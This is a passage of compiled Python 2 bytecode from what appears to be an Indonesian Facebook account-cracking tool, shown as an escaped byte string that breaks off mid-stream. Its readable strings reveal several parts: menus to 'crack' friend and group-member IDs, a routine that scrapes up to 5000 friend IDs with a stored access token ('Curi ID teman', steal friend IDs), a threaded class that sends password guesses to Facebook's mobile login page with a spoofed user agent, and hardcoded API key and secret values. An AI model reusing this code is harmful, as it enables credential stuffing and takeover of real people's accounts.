\x1b[1;92mEnter...i\x01\x00\x00\x00s$\x00\x00\x00https://mobile.facebook.com/home.phpt\n\x00\x00\x00checkpointsA\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAkun kena checkpoint\nCoba Login dengan browser.s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x16\x00\x00\x00\x1b[1;91m[X] Login Gagal(\x0b\x00\x00\x00R\x10\x00\x00\x00t\x04\x00\x00\x00bukat\x02\x00\x00\x00brt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlR\x07\x00\x00\x00R7\x00\x00\x00t\x03\x00\x00\x00logR,\x00\x00\x00(\x06\x00\x00\x00t\x02\x00\x00\x00ust\x02\x00\x00\x00pat\x03\x00\x00\x00urlt\x05\x00\x00\x00inputt\x07\x00\x00\x00inpaut3t\x07\x00\x00\x00inputs3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x05\x00\x00\x00login\xf3\x00\x00\x00s0\x00\x00\x00\x00\x02\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x10\x01\r\x01\r\x01\n\x01\x0c\x01\x18\x01\x05\x01\t\x01\x0c\x01\n\x01\n\x01\t\x01\x0c\x01\x05\x01\x0c\x01\n\x02\x05\x01\x0c\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x8c\x00\x00\x00t\x00\x00t\x01\x00\x83\x01\x00d\x01\x00k\x03\x00r\x88\x00d\x02\x00GHyS\x00t\x02\x00t\x03\x00j\x04\x00j\x05\x00d\x01\x00\x19d\x03\x00\x17d\x04\x00\x83\x02\x00j\x06\x00d\x05\x00j\x07\x00t\x01\x00\x83\x01\x00\x83\x01\x00\x01d\x06\x00GHt\x08\x00d\x07\x00\x83\x01\x00\x01t\t\x00d\x08\x00\x83\x01\x00}\x00\x00t\n\x00\x83\x00\x00\x01Wq\x88\x00\x01\x01\x01d\t\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00q\x88\x00Xn\x00\x00d\x00\x00S(\n\x00\x00\x00Ni\x00\x00\x00\x00s\x1e\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMenyimpan...s\x0c\x00\x00\x00/IDgroup.txtt\x01\x00\x00\x00ws\x01\x00\x00\x00\ns2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID tersimpan \x1b[1;97m*IDgrup.txt*i\x01\x00\x00\x00s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x19\x00\x00\x00\x1b[1;91m[X] Gagal meyimpan(\x0b\x00\x00\x00R\x0c\x00\x00\x00t\t\x00\x00\x00id_bgroupR\x1b\x00\x00\x00R\x08\x00\x00\x00R\t\x00\x00\x00t\x04\x00\x00\x00patht\x05\x00\x00\x00writet\x04\x00\x00\x00joinR7\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x02\x00\x00\x00t\x06\x00\x00\x00input3t\x06\x00\x00\x00inpus3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00simpan\x0f\x01\x00\x00s\x16\x00\x00\x00\x00\x01\x12\x01\x05\x01\x03\x01-\x01\x05\x01\n\x01\x0c\x01\x0b\x01\x03\x01\x05\x01c\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00st\x00\x00\x00y+\x00t\x00\x00j\x01\x00|\x00\x00\x83\x01\x00}\x01\x00t\x02\x00t\x00\x00j\x03\x00_\x04\x00|\x01\x00j\x05\x00\x83\x00\x00}\x01\x00Wn\x1f\x00\x01\x01\x01d\x01\x00GHt\x06\x00d\x02\x00\x83\x01\x00}\x02\x00t\x07\x00\x83\x00\x00\x01n\x01\x00Xd\x03\x00|\x01\x00k\x06\x00rl\x00t\x08\x00t\x00\x00j\t\x00\x83\x00\x00j\n\x00\x83\x01\x00S|\x01\x00Sd\x00\x00S(\x04\x00\x00\x00Ns\x10\x00\x00\x00\x1b[1;91m[!] Errors!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x1b\x00\x00\x00<link rel="redirect" href="(\x0b\x00\x00\x00R@\x00\x00\x00R\x1b\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlR\x1c\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R?\x00\x00\x00t\t\x00\x00\x00find_linkRH\x00\x00\x00(\x03\x00\x00\x00t\x01\x00\x00\x00dR\r\x00\x00\x00t\x06\x00\x00\x00inpute(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R?\x00\x00\x00\x1b\x01\x00\x00s\x16\x00\x00\x00\x00\x01\x03\x01\x0f\x01\x0c\x01\x10\x01\x03\x01\x05\x01\x0c\x01\x0b\x01\x0c\x01\x13\x02c\x01\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\xb1\x00\x00\x00x\xaa\x00t\x00\x00j\x01\x00d\x01\x00|\x00\x00\x83\x02\x00D]\x96\x00}\x01\x00|\x01\x00j\x02\x00d\x02\x00\x83\x01\x00d\x03\x00k\x02\x00rC\x00|\x01\x00j\x03\x00d\x04\x00d\x05\x00\x83\x02\x00}\x02\x00n\x1e\x00|\x01\x00j\x03\x00d\x06\x00d\x05\x00\x83\x02\x00j\x03\x00d\x07\x00d\x05\x00\x83\x02\x00}\x02\x00|\x02\x00t\x04\x00k\x07\x00r\x13\x00t\x05\x00\x83\x00\x00\x01t\x06\x00j\x07\x00j\x08\x00d\x08\x00|\x02\x00\x17d\t\x00\x17\x83\x01\x00\x01t\x06\x00j\x07\x00j\t\x00\x83\x00\x00\x01t\x04\x00j\n\x00|\x02\x00\x83\x01\x00\x01q\x13\x00q\x13\x00Wd\x00\x00S(\n\x00\x00\x00Ns\x1a\x00\x00\x00<h3><a href="/(.*?)fref=pbs\x0b\x00\x00\x00profile.phpi\xff\xff\xff\xfft\x01\x00\x00\x00?t\x00\x00\x00\x00s\x0f\x00\x00\x00profile.php?id=s\x05\x00\x00\x00&s0\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;96mMengumpulkan \x1b[1;91m: \x1b[1;97ms\x01\x00\x00\x00\n(\x0b\x00\x00\x00t\x02\x00\x00\x00ret\x07\x00\x00\x00findallt\x04\x00\x00\x00findt\x07\x00\x00\x00replaceRN\x00\x00\x00t\x0b\x00\x00\x00banner_likeR\t\x00\x00\x00t\x06\x00\x00\x00stdoutRP\x00\x00\x00t\x05\x00\x00\x00flushR#\x00\x00\x00(\x03\x00\x00\x00RY\x00\x00\x00t\x01\x00\x00\x00iR*\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x10\x00\x00\x00saring_id_group1(\x01\x00\x00s\x12\x00\x00\x00\x00\x01\x19\x01\x15\x01\x15\x02\x1e\x01\x0c\x01\x07\x01\x18\x01\r\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\xbf\x00\x00\x00x\x8f\x00t\x00\x00\x83\x00\x00\x01t\x01\x00d\x01\x00\x83\x01\x00a\x02\x00d\x02\x00GHt\x03\x00d\x03\x00t\x02\x00\x17d\x04\x00\x17\x83\x01\x00}\x00\x00d\x05\x00j\x04\x00t\x05\x00j\x06\x00d\x06\x00|\x00\x00\x83\x02\x00d\x07\x00\x19j\x07\x00\x83\x00\x00d\x08\x00\x1f\x83\x01\x00}\x01\x00y\x1a\x00t\x08\x00j\t\x00d\t\x00d\n\x00\x83\x00\x01j\n\x00}\x02\x00PWq\x03\x00\x01\x01\x01d\x0b\x00GHt\x0b\x00d\x0c\x00\x83\x01\x00\x01q\x03\x00q\x03\x00Xq\x03\x00Wd\r\x00|\x01\x00\x16GHt\x0c\x00d\x0e\x00\x83\x01\x00}\x03\x00t\x0b\x00d\x08\x00\x83\x01\x00\x01t\r\x00|\x00\x00\x83\x01\x00\x01|\x02\x00S(\x0f\x00\x00\x00Ns*\x00\x00\x00\x1b[1;91m[+]\x1b[1;92m ID Grup\x1b[1;91m :\x1b[1;97m s#\x00\x00\x00\x1b[1;91m[+] \x1b[1;96mMengecek Grup....s0\x00\x00\x00https://m.facebook.com/browse/group/members/?id=sI\x00\x00\x00&start=0&listType=list_nonfriend&refid=18&_rdc=1&_rdrt\x01\x00\x00\x00 s\x14\x00\x00\x00<title>(.*?)</title>i\x00\x00\x00\x00i\x01\x00\x00\x00t\t\x00\x00\x00url_regexs\x16\x00\x00\x00/browse/group/members/s/\x00\x00\x00\x1b[1;91m[!] ID yang anda masukan tidak ditemukani\x02\x00\x00\x00s/\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama grup \x1b[1;97m: \x1b[4m%s\x1b[0ms\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter...(\x0e\x00\x00\x00R9\x00\x00\x00R\x10\x00\x00\x00t\x08\x00\x00\x00id_groupR?\x00\x00\x00RQ\x00\x00\x00R]\x00\x00\x00R^\x00\x00\x00t\x05\x00\x00\x00splitR@\x00\x00\x00RX\x00\x00\x00RH\x00\x00\x00R7\x00\x00\x00R\x07\x00\x00\x00Re\x00\x00\x00(\x04\x00\x00\x00R*\x00\x00\x00t\x04\x00\x00\x00namat\x04\x00\x00\x00nextRI\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x10\x00\x00\x00saring_id_group03\x01\x00\x00s$\x00\x00\x00\x00\x02\x03\x01\x07\x01\x0c\x01\x05\x01\x14\x01)\x01\x03\x01\x15\x01\x05\x01\x03\x01\x05\x01\n\x01\x0b\x01\t\x01\x0c\x01\n\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x91\x00\x00\x00t\x00\x00d\x01\x00k\x03\x00r3\x00t\x01\x00\x83\x00\x00\x01t\x02\x00\x83\x00\x00\x01t\x00\x00d\x02\x00k\x02\x00r3\x00t\x03\x00\x83\x00\x00\x01q3\x00n\x00\x00t\x04\x00\x83\x00\x00}\x00\x00xG\x00t\x05\x00t\x06\x00|\x00\x00\x83\x01\x00\x83\x01\x00\x01y\x19\x00t\x07\x00j\x08\x00d\x03\x00d\x04\x00\x83\x00\x01j\t\x00}\x00\x00Wq?\x00\x01\x01\x01d\x05\x00t\n\x00t\x0b\x00\x83\x01\x00\x16GHPq?\x00Xq?\x00Wt\x0c\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00Ni\x01\x00\x00\x00i\x00\x00\x00\x00Rg\x00\x00\x00s\x16\x00\x00\x00/browse/group/members/s:\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mHanya Bisa Mengambil \x1b[1;97m%d \x1b[1;92mID(\r\x00\x00\x00RE\x00\x00\x00R\x17\x00\x00\x00RL\x00\x00\x00R\x16\x00\x00\x00Rl\x00\x00\x00Re\x00\x00\x00R?\x00\x00\x00R@\x00\x00\x00RX\x00\x00\x00RH\x00\x00\x00R\x0c\x00\x00\x00RN\x00\x00\x00RT\x00\x00\x00(\x01\x00\x00\x00Rk\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R.\x00\x00\x00G\x01\x00\x00s\x1c\x00\x00\x00\x00\x01\x0c\x01\x07\x01\x07\x01\x0c\x01\r\x01\t\x01\x03\x01\x10\x01\x03\x01\x19\x01\x03\x01\x0f\x01\t\x01t\x02\x00\x00\x00mtc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00B\x00\x00\x00s#\x00\x00\x00e\x00\x00Z\x01\x00d\x00\x00\x84\x00\x00Z\x02\x00d\x01\x00\x84\x00\x00Z\x03\x00d\x02\x00\x84\x00\x00Z\x04\x00RS(\x03\x00\x00\x00c\x03\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s/\x00\x00\x00t\x00\x00j\x01\x00j\x02\x00|\x00\x00\x83\x01\x00\x01|\x01\x00|\x00\x00_\x03\x00d\x01\x00|\x00\x00_\x04\x00|\x02\x00|\x00\x00_\x05\x00d\x00\x00S(\x02\x00\x00\x00Ni\x03\x00\x00\x00(\x06\x00\x00\x00t\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x08\x00\x00\x00__init__R\x1a\x00\x00\x00R*\x00\x00\x00t\x01\x00\x00\x00p(\x03\x00\x00\x00t\x04\x00\x00\x00selfRd\x00\x00\x00Rq\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>Rp\x00\x00\x00W\x01\x00\x00s\x08\x00\x00\x00\x00\x01\x10\x01\t\x01\t\x01c\x01\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x10\x00\x00\x00|\x00\x00j\x00\x00|\x00\x00j\x01\x00f\x02\x00S(\x01\x00\x00\x00N(\x02\x00\x00\x00R*\x00\x00\x00R\x1a\x00\x00\x00(\x01\x00\x00\x00Rr\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00update\\\x01\x00\x00s\x02\x00\x00\x00\x00\x01c\x01\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\xde\x00\x00\x00yO\x00t\x00\x00j\x01\x00t\x00\x00j\x02\x00d\x01\x00d\x02\x00d\x03\x00t\x03\x00j\x04\x00i\x02\x00|\x00\x00j\x05\x00d\x04\x006|\x00\x00j\x06\x00d\x05\x006\x83\x01\x00d\x06\x00i\x01\x00d\x07\x00d\x08\x006\x83\x00\x03\x83\x01\x00}\x01\x00Wn:\x00\x04t\x07\x00k\n\x00ro\x00\x01\x01\x01t\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01n\x1d\x00\x01\x01\x01d\t\x00|\x00\x00_\x0b\x00t\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01n\x01\x00Xd\n\x00|\x01\x00j\x0c\x00k\x06\x00s\xaa\x00d\x0b\x00|\x01\x00j\x0c\x00k\x06\x00r\xb6\x00d\x0c\x00|\x00\x00_\x0b\x00n$\x00d\r\x00|\x01\x00j\x0c\x00k\x06\x00r\xd1\x00d\x0e\x00|\x00\x00_\x0b\x00n\t\x00d\x0f\x00|\x00\x00_\x0b\x00d\x00\x00S(\x10\x00\x00\x00NRH\x00\x00\x00s \x00\x00\x00https://m.facebook.com/login.phpt\x04\x00\x00\x00dataR;\x00\x00\x00R<\x00\x00\x00t\x07\x00\x00\x00headerssR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16s\n\x00\x00\x00User-Agenti\x08\x00\x00\x00R=\x00\x00\x00s\x0b\x00\x00\x00save-devicei\x01\x00\x00\x00R>\x00\x00\x00i\x02\x00\x00\x00i\x00\x00\x00\x00(\r\x00\x00\x00t\x07\x00\x00\x00urllib2t\x07\x00\x00\x00urlopent\x07\x00\x00\x00Requestt\x06\x00\x00\x00urllibt\t\x00\x00\x00urlencodeR\x1a\x00\x00\x00Rq\x00\x00\x00t\x11\x00\x00\x00KeyboardInterruptR\x08\x00\x00\x00R\t\x00\x00\x00R\n\x00\x00\x00R*\x00\x00\x00RH\x00\x00\x00(\x02\x00\x00\x00Rr\x00\x00\x00Rt\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x03\x00\x00\x00run^\x01\x00\x00s\x18\x00\x00\x00\x00\x01\x03\x01O\x01\r\x01\x10\x01\x03\x01\t\x01\x11\x01\x1e\x01\x0c\x01\x0f\x01\x0c\x02(\x05\x00\x00\x00t\x08\x00\x00\x00__name__t\n\x00\x00\x00__module__Rp\x00\x00\x00Rs\x00\x00\x00R|\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>Rm\x00\x00\x00V\x01\x00\x00s\x06\x00\x00\x00\x06\x01\t\x05\t\x02c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s!\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHd\x02\x00GHd\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ns/\x00\x00\x00\x1b[1;91m[\x1b[1;97m1.\x1b[1;91m] \x1b[1;92mCrack ID Temans9\x00\x00\x00\x1b[1;91m[\x1b[1;97m2.\x1b[1;91m] \x1b[1;92mCrack ID teman dari grups!\x00\x00\x00\x1b[1;91m[\x1b[1;97m3.\x1b[1;91m] Kembali(\x02\x00\x00\x00Ra\x00\x00\x00t\x06\x00\x00\x00pilihg(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R/\x00\x00\x00n\x01\x00\x00s\n\x00\x00\x00\x00\x01\x07\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s^\x00\x00\x00t\x00\x00d\x01\x00d\x02\x00d\x03\x00d\x04\x00g\x03\x00\x83\x02\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r.\x00t\x01\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x03\x00k\x02\x00rD\x00t\x02\x00\x83\x00\x00\x01n\x16\x00|\x00\x00d\x04\x00k\x02\x00rZ\x00t\x03\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x05\x00\x00\x00Ns)\x00\x00\x00\n\x1b[1;91mmbfz\x1b[1;97m/\x1b[1;91mcrack\x1b[1;97m> i\x01\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00(\x04\x00\x00\x00R\x14\x00\x00\x00t\x08\x00\x00\x00ayocrackt\t\x00\x00\x00ayocrackgR\x16\x00\x00\x00(\x01\x00\x00\x00t\x07\x00\x00\x00karjok2(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x7f\x00\x00\x00t\x01\x00\x00s\x0e\x00\x00\x00\x00\x01\x18\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01c\x01\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x1e\x01\x00\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00}\x01\x00yq\x00t\x01\x00j\x02\x00d\x03\x00d\x04\x00|\x00\x00\x83\x01\x01}\x02\x00t\x03\x00j\x04\x00|\x02\x00j\x05\x00\x83\x01\x00}\x03\x00|\x01\x00j\x06\x00|\x03\x00d\x05\x00\x19\x83\x01\x00\x01|\x01\x00j\x07\x00\x83\x00\x00\x01d\x06\x00GHd\x07\x00d\x08\x00\x14GHt\x08\x00d\t\x00\x83\x01\x00}\x04\x00t\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01Wn\x97\x00\x04t\x0b\x00k\n\x00r\xe1\x00\x01\x01\x01d\x0b\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00d\r\x00\x83\x01\x00}\x05\x00|\x05\x00d\x0e\x00k\x02\x00r\xc1\x00t\x0c\x00\x83\x00\x00\x01q\x1a\x01|\x05\x00d\x0f\x00k\x02\x00r\xd7\x00t\n\x00\x83\x00\x00\x01q\x1a\x01t\r\x00\x83\x00\x00\x01n9\x00\x04t\x01\x00j\x0e\x00j\x0f\x00k\n\x00r\x19\x01\x01\x01\x01d\x10\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00d\x11\x00\x83\x01\x00}\x06\x00t\n\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x12\x00\x00\x00Ns\t\x00\x00\x00login.txtRM\x00\x00\x00s\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramst\x0c\x00\x00\x00access_tokens!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLogin berhasil.i2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter...i\x01\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[X] Login GAGALi\x02\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCoba lagi ? (y/t) t\x01\x00\x00\x00yR\x12\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Errors!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\x10\x00\x00\x00R\x1b\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00RP\x00\x00\x00t\x05\x00\x00\x00closeR\x07\x00\x00\x00R7\x00\x00\x00R,\x00\x00\x00R\'\x00\x00\x00R)\x00\x00\x00R\x16\x00\x00\x00t\n\x00\x00\x00exceptionst\x0f\x00\x00\x00ConnectionError(\x07\x00\x00\x00Rt\x00\x00\x00t\x01\x00\x00\x00bR\x18\x00\x00\x00R*\x00\x00\x00RI\x00\x00\x00t\x06\x00\x00\x00tanya1t\x07\x00\x00\x00inputki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x1e\x00\x00\x00}\x01\x00\x00s2\x00\x00\x00\x00\x01\x0f\x01\x03\x01\x15\x01\x12\x01\x11\x01\n\x01\x05\x01\t\x01\x0c\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02\n\x01\x13\x01\x05\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\xea\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHt\x01\x00d\x02\x00\x83\x01\x00}\x00\x00t\x01\x00d\x03\x00\x83\x01\x00}\x01\x00d\x04\x00GHt\x02\x00d\x05\x00\x83\x01\x00\x01d\x06\x00}\x02\x00i\x0b\x00d\x07\x00d\x08\x006d\t\x00d\n\x006|\x00\x00d\x0b\x006d\x0c\x00d\r\x006d\x0e\x00d\x0f\x006d\x0e\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006|\x01\x00d\t\x006d\x15\x00d\x16\x006d\x17\x00d\x18\x006}\x03\x00d\x19\x00|\x00\x00\x17d\x1a\x00\x17|\x01\x00\x17d\x1b\x00\x17|\x02\x00\x17}\x04\x00t\x03\x00j\x04\x00d\x1c\x00\x83\x01\x00}\x05\x00|\x05\x00j\x05\x00|\x04\x00\x83\x01\x00\x01|\x03\x00j\x05\x00i\x01\x00|\x05\x00j\x06\x00\x83\x00\x00d\x1d\x006\x83\x01\x00\x01t\x07\x00|\x03\x00\x83\x01\x00\x01d\x00\x00S(\x1e\x00\x00\x00Ns.\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLOGIN AKUN FACEBOOK s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m s!\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSedang Masuk...i\x02\x00\x00\x00t \x00\x00\x0062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typeR;\x00\x00\x00t\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatt\x01\x00\x00\x001t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodt\x01\x00\x00\x000t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vsG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s\x1b\x00\x00\x00return_ssl_resources=0v=1.0t\x03\x00\x00\x00md5t\x03\x00\x00\x00sig(\x08\x00\x00\x00Ra\x00\x00\x00R\x10\x00\x00\x00R7\x00\x00\x00t\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newRs\x00\x00\x00t\t\x00\x00\x00hexdigestR\x1e\x00\x00\x00(\x06\x00\x00\x00R\x1a\x00\x00\x00t\x03\x00\x00\x00pwdt\n\x00\x00\x00API_SECRETRt\x00\x00\x00R\x9d\x00\x00\x00R\r\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R)\x00\x00\x00\x99\x01\x00\x00s\x1a\x00\x00\x00\x00\x01\x07\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x06\x00S\x00\x1a\x01\x0f\x01\r\x02\x1a\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x92\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00d\x04\x00\x14GHd\x05\x00GHd\x06\x00GHt\x03\x00d\x07\x00\x83\x01\x00}\x01\x00t\x04\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00\x83\x00\x00\x01d\x08\x00GHt\x06\x00d\t\x00\x83\x01\x00\x01t\x07\x00j\x08\x00d\n\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\t\x00j\n\x00|\x02\x00\x83\x01\x00}\x03\x00g\x00\x00}\x04\x00x-\x00|\x03\x00d\x0b\x00\x19d\x0c\x00\x19D]\x1d\x00}\x05\x00|\x05\x00d\r\x00\x19}\x06\x00|\x04\x00j\x0b\x00|\x06\x00\x83\x01\x00\x01q\xa0\x00Wx\x8a\x00|\x04\x00D]\x82\x00}\x07\x00t\x00\x00d\x0e\x00d\x0f\x00\x83\x02\x00}\x08\x00|\x08\x00j\x0c\x00|\x07\x00d\x10\x00\x17\x83\x01\x00\x01t\x00\x00d\x0e\x00d\x02\x00\x83\x02\x00}\t\x00|\t\x00j\x01\x00\x83\x00\x00j\r\x00\x83\x00\x00}\n\x00t\x0e\x00j\x0f\x00j\x0c\x00d\x11\x00t\x10\x00t\x11\x00|\n\x00\x83\x01\x00\x83\x01\x00\x17d\x12\x00\x17\x83\x01\x00\x01t\x0e\x00j\x0f\x00j\x12\x00\x83\x00\x00\x01|\x08\x00j\x13\x00\x83\x00\x00\x01q\xc8\x00Wt\x06\x00d\x13\x00\x83\x01\x00\x01d\x14\x00GHd\x15\x00GHt\x06\x00d\x13\x00\x83\x01\x00\x01d\x16\x00GHt\x06\x00d\x13\x00\x83\x01\x00\x01t\x03\x00d\x07\x00\x83\x01\x00}\x0b\x00t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors$\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Login dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCuri ID teman...i\x02\x00\x00\x00sF\x00\x00\x00https://graph.facebook.com/me?fields=friends.limit(5000)&access_token=t\x07\x00\x00\x00friendsRt\x00\x00\x00R\x1a\x00\x00\x00s\t\x00\x00\x00teman.txtR*\x00\x00\x00s\x01\x00\x00\x00\ns&\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mMendapatkan \x1b[1;97ms\x11\x00\x00\x00 \x1b[1;92mID teman.i\x01\x00\x00\x00R\\\x00\x00\x00s\x1d\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mBerhasil ./s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID tersimpan \x1b[1;97m*teman.txt*(\x14\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x17\x00\x00\x00R7\x00\x00\x00Ry\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00t\x04\x00\x00\x00loadR#\x00\x00\x00RP\x00\x00\x00Ri\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00t\x03\x00\x00\x00strR\x0c\x00\x00\x00Rc\x00\x00\x00R\x86\x00\x00\x00(\x0c\x00\x00\x00R)\x00\x00\x00t\t\x00\x00\x00inputmekiRH\x00\x00\x00t\x07\x00\x00\x00memekidt\x03\x00\x00\x00idsRd\x00\x00\x00R\x13\x00\x00\x00t\x04\x00\x00\x00zeddt\x06\x00\x00\x00bukaidt\x06\x00\x00\x00bacaidR\x9b\x00\x00\x00t\x06\x00\x00\x00input2(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R-\x00\x00\x00\xa7\x01\x00\x00sB\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x07\x01\x05\x01\n\x01\x13\x01\x0f\x01\x06\x01\x15\x01\n\x01\x11\x01\r\x01\x0f\x01\x11\x